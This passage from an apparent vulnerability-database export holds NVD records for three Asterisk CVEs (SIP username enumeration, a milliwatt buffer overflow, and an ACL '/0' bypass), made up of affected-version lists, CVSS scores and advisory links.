              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F745AF0A-D6A6-4429-BBBE-347BF41999BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC44F61B-AB96-4643-899B-19B9E3B4F05C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:*:*:*:*:*:*:*",
              "matchCriteriaId": "F788A255-CF21-424F-9F30-8A744CC16740",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "92B8AA8E-D49B-4AD7-8AFC-BD4F9E9C7A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0606F179-8817-4124-B92B-CD868B216320",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E93609A6-7FFD-4179-86E9-0D1292B035B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.42:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E73DCA2-DEB0-4966-9822-26543E16A3D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.42:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "310FFFE1-1400-498F-B576-FA76DCC382BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.42:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "225DA4A0-CCAB-448E-8ED8-399D68C45CF0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The SIP over UDP implementation in Asterisk Open Source 1.4.x before 1.4.43, 1.6.x before 1.6.2.21, and 1.8.x before 1.8.7.2 uses different port numbers for responses to invalid requests depending on whether a SIP username exists, which allows remote attackers to enumerate usernames via a series of requests."
    },
    {
      "lang": "es",
      "value": "La implementaci\u00f3n de SIP sobre UDP de Asterisk Open Source 1.4.x anteriores a 1.4.43, 1.6.x anteriores a 1.6.2.21, y 1.8.x anteriores a 1.8.7.2 utiliza diferentes n\u00fameros de puertos para respuestas a peticiones inv\u00e1lidas dependiendo de si el nombre de usuario SIP existe, lo que permite a atacantes remotos enumerar nombres de usuario a trav\u00e9s de series de peticiones."
    }
  ],
  "id": "CVE-2011-4597",
  "lastModified": "2024-11-21T01:32:37.697",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-12-15T03:57:34.310",
  "references": [
    {
      "source": "secalert@redhat.com",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-013.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://osvdb.org/77597"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://secunia.com/advisories/47273"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2367"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0151.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-013.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.digium.com/pipermail/asterisk-dev/2011-November/052191.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/77597"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/47273"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2367"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-09-18 18:55

Modified

2024-11-21 01:36

Severity ?

Summary

Stack-based buffer overflow in the milliwatt_generate function in the Miliwatt application in Asterisk 1.4.x before 1.4.44, 1.6.x before 1.6.2.23, 1.8.x before 1.8.10.1, and 10.x before 10.2.1, when the o option is used and the internal_timing option is off, allows remote attackers to cause a denial of service (application crash) via a large number of samples in an audio packet.

References

URL	Tags
secalert@redhat.com	http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html	Broken Link
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff	Patch, Vendor Advisory
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2012-002.pdf	Vendor Advisory
secalert@redhat.com	http://osvdb.org/80125	Broken Link
secalert@redhat.com	http://secunia.com/advisories/48417	Broken Link
secalert@redhat.com	http://secunia.com/advisories/48941	Broken Link
secalert@redhat.com	http://securitytracker.com/id?1026812	Third Party Advisory, VDB Entry
secalert@redhat.com	http://www.asterisk.org/node/51797	Broken Link
secalert@redhat.com	http://www.debian.org/security/2012/dsa-2460	Third Party Advisory
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2012/03/16/10	Mailing List, Patch, Third Party Advisory
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2012/03/16/17	Mailing List, Patch, Third Party Advisory
secalert@redhat.com	http://www.securityfocus.com/bid/52523	Third Party Advisory, VDB Entry
secalert@redhat.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/74082	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-002.pdf	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/80125	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/48417	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/48941	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1026812	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/51797	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2012/dsa-2460	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2012/03/16/10	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2012/03/16/17	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/52523	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/74082	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
debian	debian_linux	6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "83BEEFED-03F9-4E63-B348-41D2A112D124",
              "versionEndExcluding": "1.4.44",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A847AF83-3D35-42A6-A994-23E8D9C64379",
              "versionEndExcluding": "1.6.2.23",
              "versionStartIncluding": "1.6.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEB0F939-6D71-415D-88B3-1654DEB80671",
              "versionEndExcluding": "1.8.10.1",
              "versionStartIncluding": "1.8.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "36CEACD4-5FB6-44BA-B402-6CB4BA2EA4D6",
              "versionEndExcluding": "10.2.1",
              "versionStartIncluding": "10.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "036E8A89-7A16-411F-9D31-676313BB7244",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the milliwatt_generate function in the Miliwatt application in Asterisk 1.4.x before 1.4.44, 1.6.x before 1.6.2.23, 1.8.x before 1.8.10.1, and 10.x before 10.2.1, when the o option is used and the internal_timing option is off, allows remote attackers to cause a denial of service (application crash) via a large number of samples in an audio packet."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de desboramiento de buffer basado en memoria din\u00e1mica en la funci\u00f3n milliwatt_generate en main/utils.c en Asterisk Asterisk v1.4.x antes de v1.4.44, v1.6.x antes de v1.6.2.23, v1.8.x antes de v1.8.10.1, and v10.x antes de v10.2.1, permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda de la aplicaci\u00f3n) o posiblemente ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una gran n\u00famero de muestras en un paquete de audio."
    }
  ],
  "id": "CVE-2012-1183",
  "lastModified": "2024-11-21T01:36:36.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-09-18T18:55:04.210",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-002.pdf"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/80125"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/48417"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/48941"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1026812"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.asterisk.org/node/51797"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2012/dsa-2460"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/52523"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74082"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://archives.neohapsis.com/archives/bugtraq/2012-03/0069.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-002-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-002.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/80125"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/48417"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://secunia.com/advisories/48941"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1026812"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://www.asterisk.org/node/51797"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.debian.org/security/2012/dsa-2460"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2012/03/16/17"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/52523"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74082"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2010-04-01 21:30

Modified

2024-11-21 01:13

Severity ?

Summary

main/acl.c in Asterisk Open Source 1.6.0.x before 1.6.0.25, 1.6.1.x before 1.6.1.17, and 1.6.2.x before 1.6.2.5 does not properly enforce remote host access controls when CIDR notation "/0" is used in permit= and deny= configuration rules, which causes an improper arithmetic shift and might allow remote attackers to bypass ACL rules and access services from unauthorized hosts.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2010-003.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html
cve@mitre.org	http://osvdb.org/62588
cve@mitre.org	http://secunia.com/advisories/38752	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/39096
cve@mitre.org	http://www.securityfocus.com/archive/1/509757/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/38424
cve@mitre.org	http://www.vupen.com/english/advisories/2010/0475	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/56552
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2010-003.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/62588
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/38752	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/39096
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/509757/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/38424
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2010/0475	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/56552

Impacted products

Vendor	Product	Version
digium	asterisk	1.6.0
digium	asterisk	1.6.0.1
digium	asterisk	1.6.0.2
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.5
digium	asterisk	1.6.0.6
digium	asterisk	1.6.0.7
digium	asterisk	1.6.0.8
digium	asterisk	1.6.0.9
digium	asterisk	1.6.0.10
digium	asterisk	1.6.0.12
digium	asterisk	1.6.0.13
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.15
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.17
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.19
digium	asterisk	1.6.0.20
digium	asterisk	1.6.0.21
digium	asterisk	1.6.0.21
digium	asterisk	1.6.0.22
digium	asterisk	1.6.0.23
digium	asterisk	1.6.0.24
digium	asterisk	1.6.1
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
